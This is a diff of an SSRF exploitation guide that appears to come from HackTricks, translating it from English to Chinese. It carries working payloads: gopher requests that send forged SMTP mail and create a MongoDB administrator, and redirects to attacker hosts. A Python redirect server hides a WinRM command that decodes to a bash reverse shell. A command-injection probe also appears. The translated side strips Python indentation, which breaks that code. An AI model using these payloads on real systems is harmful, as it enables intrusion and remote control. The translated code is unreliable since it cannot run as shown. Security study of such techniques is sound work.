-  - If the SSRF is executed by **curl**, curl has a feature called [**URL globbing**](https://everything.curl.dev/cmdline/globbing) that could be useful to bypass WAFs. For example in this [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) you can find this example for a **path traversal via `file` protocol**:
-
+- **Curl URL globbing - WAF 绕过**
+- 如果 SSRF 是通过 **curl** 执行的，curl 有一个叫做 [**URL globbing**](https://everything.curl.dev/cmdline/globbing) 的功能，这可能对绕过 WAF 有用。例如，在这个 [**writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) 中，你可以找到一个关于 **通过 `file` 协议的路径遍历** 的示例：
 ```
 file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
 ```
-
 - **Gopher://**
-  - The Gopher protocol's capability to specify IP, port, and bytes for server communication is discussed, alongside tools like Gopherus and remote-method-guesser for crafting payloads. Two distinct uses are illustrated:
+- Gopher协议能够指定IP、端口和字节用于服务器通信，讨论了像Gopherus和remote-method-guesser这样的工具来构造有效载荷。展示了两种不同的用法：
 
 ### Gopher://
 
-Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
-Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services.
+使用此协议，您可以指定服务器要**发送**的**IP、端口和字节**。然后，您基本上可以利用SSRF来**与任何TCP服务器通信**（但您需要先知道如何与该服务对话）。\
+幸运的是，您可以使用[Gopherus](https://github.com/tarunkant/Gopherus)为多个服务创建有效载荷。此外，[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)可用于为_Java RMI_服务创建_gopher_有效载荷。
 
 **Gopher smtp**
-
 ```
 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
 will make a request like
@@ -95,26 +90,20 @@ Subject: Ah Ah AHYou didn't say the magic word !
 .
 QUIT
 ```
-
 **Gopher HTTP**
-
 ```bash
 #For new lines you can use %0A, %0D%0A
 gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
 gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
 ```
-
-**Gopher SMTP — Back connect to 1337**
-
+**Gopher SMTP — 反向连接到 1337**
 ```php:redirect.php
 <?php
 header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
 ?>Now query it.
 https://example.com/?q=http://evil.com/redirect.php.
 ```
-
-#### Gopher MongoDB -- Create user with username=admin with password=admin123 and with permission=administrator
-
+#### Gopher MongoDB -- 创建用户名为admin，密码为admin123，权限为administrator的用户
 ```bash
 # Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
 curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
@@ -123,69 +112,63 @@ curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
 06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
 %00%00administrator%00%00%00%00'
 ```
+## SSRF通过引荐头和其他方式
 
-## SSRF via Referrer header & Others
+服务器上的分析软件通常会记录引荐头以跟踪传入链接，这种做法无意中使应用程序暴露于服务器端请求伪造（SSRF）漏洞。这是因为此类软件可能会访问引荐头中提到的外部URL，以分析引用网站内容。为了发现这些漏洞，建议使用Burp Suite插件“**Collaborator Everywhere**”，利用分析工具处理Referer头的方式来识别潜在的SSRF攻击面。
 
-Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities. This is because such software may visit external URLs mentioned in the Referrer header to analyze referral site content. To uncover these vulnerabilities, the Burp Suite plugin "**Collaborator Everywhere**" is advised, leveraging the way analytics tools process the Referer header to identify potential SSRF attack surfaces.
-
-## SSRF via SNI data from certificate
-
-A misconfiguration that could enable the connection to any backend through a simple setup is illustrated with an example Nginx configuration:
+## SSRF通过证书中的SNI数据
 
+一个可能通过简单设置启用与任何后端连接的错误配置示例如下所示：
 ```
 stream {
-    server {
-        listen 443;
-        resolver 127.0.0.11;
-        proxy_pass $ssl_preread_server_name:443;
-        ssl_preread on;
-    }
+server {
+listen 443;
+resolver 127.0.0.11;
+proxy_pass $ssl_preread_server_name:443;
+ssl_preread on;
+}
 }
 ```
-
-In this configuration, the value from the Server Name Indication (SNI) field is directly utilized as the backend's address. This setup exposes a vulnerability to Server-Side Request Forgery (SSRF), which can be exploited by merely specifying the desired IP address or domain name in the SNI field. An exploitation example to force a connection to an arbitrary backend, such as `internal.host.com`, using the `openssl` command is given below:
-
+在此配置中，服务器名称指示（SNI）字段中的值被直接用作后端地址。此设置暴露了服务器端请求伪造（SSRF）漏洞，可以通过在SNI字段中仅指定所需的IP地址或域名来利用。以下是一个利用示例，使用`openssl`命令强制连接到任意后端，例如`internal.host.com`：
 ```bash
 openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 ```
+## [Wget 文件上传](../file-upload/#wget-file-upload-ssrf-trick)
 
-## [Wget file upload](../file-upload/#wget-file-upload-ssrf-trick)
+## SSRF 与命令注入
 
-## SSRF with Command Injection
+可以尝试一个有效载荷，例如： `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
 
-It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
+## PDFs 渲染
 
-## PDFs Rendering
+如果网页自动创建一个包含您提供的一些信息的 PDF，您可以 **插入一些将由 PDF 创建者**（服务器）在创建 PDF 时执行的 JS，您将能够利用 SSRF。 [**在这里找到更多信息**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
 
-If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
+## 从 SSRF 到 DoS
 
-## From SSRF to DoS
+创建多个会话并尝试通过会话利用 SSRF 下载大文件。
 
-Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
+## SSRF PHP 函数
 
-## SSRF PHP Functions
-
-Check the following page for vulnerable PHP and even Wordpress functions:
+请查看以下页面以获取易受攻击的 PHP 甚至 Wordpress 函数：
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
 {{#endref}}
 
-## SSRF Redirect to Gopher
-
-For some exploitations you might need to **send a redirect response** (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect:
+## SSRF 重定向到 Gopher
 
+对于某些利用，您可能需要 **发送重定向响应**（可能使用不同的协议，如 gopher）。在这里，您有不同的 Python 代码可以响应重定向：
 ```python
 # First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
 from http.server import HTTPServer, BaseHTTPRequestHandler
 import ssl
 
 class MainHandler(BaseHTTPRequestHandler):
-    def do_GET(self):
-        print("GET")
-        self.send_response(301)
-        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
-        self.end_headers()
+def do_GET(self):
+print("GET")
+self.send_response(301)
+self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
+self.end_headers()
 
 httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
 httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
@@ -199,30 +182,28 @@ app = Flask(__name__)
 
 @app.route('/')
 def root():
-    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
+return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
 
 if __name__ == "__main__":
-    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
+app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
 ```
-
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
 
-## Misconfigured proxies to SSRF
+## 配置错误的代理导致 SSRF
 
-Tricks [**from this post**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
+来自 [**这篇文章的技巧**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
 
 ### Flask
 
 <details>
 
-<summary>Flask proxy vulnerable code</summary>
-
+<summary>Flask 代理漏洞代码</summary>
 ```python
 from flask import Flask
 from requests import get
@@ -234,42 +215,36 @@ SITE_NAME = 'https://google.com'
 @app.route('/<path:path>')
 
 def proxy(path):
-  return get(f'{SITE_NAME}{path}').content
+return get(f'{SITE_NAME}{path}').content
 
 if __name__ == "__main__":
-    app.run(threaded=False)
+app.run(threaded=False)
 ```
-
 </details>
 
-Flask allows to use **`@`** as initial character, which allows to make the **initial host name the username** and inject a new one. Attack request:
-
+Flask 允许使用 **`@`** 作为初始字符，这使得 **初始主机名成为用户名** 并注入一个新的。攻击请求：
 ```http
 GET @evildomain.com/ HTTP/1.1
 Host: target.com
 Connection: close
 ```
-
 ### Spring Boot <a href="#heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation" id="heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation"></a>
 
-Vulnerable code:
+易受攻击的代码：
 
 <figure><img src="../../images/image (1201).png" alt=""><figcaption></figcaption></figure>
 
-It was discovered that It's possible to **start the path** of a request with character **`;`** which allows to use then **`@`** and inject a new host to access. Attack request:
-
+发现请求的**路径**可以以字符**`;`**开头，这允许使用**`@`**并注入一个新主机以进行访问。攻击请求：
 ```http
 GET ;@evil.com/url HTTP/1.1
 Host: target.com
 Connection: close
 ```
-
-### PHP Built-in Web Server <a href="#heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation" id="heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation"></a>
+### PHP 内置 Web 服务器 <a href="#heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation" id="heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation"></a>
 
 <details>
 
-<summary>Vulnerable PHP code</summary>
-
+<summary>易受攻击的 PHP 代码</summary>
 ```php
 <?php
 $site = "http://ifconfig.me";
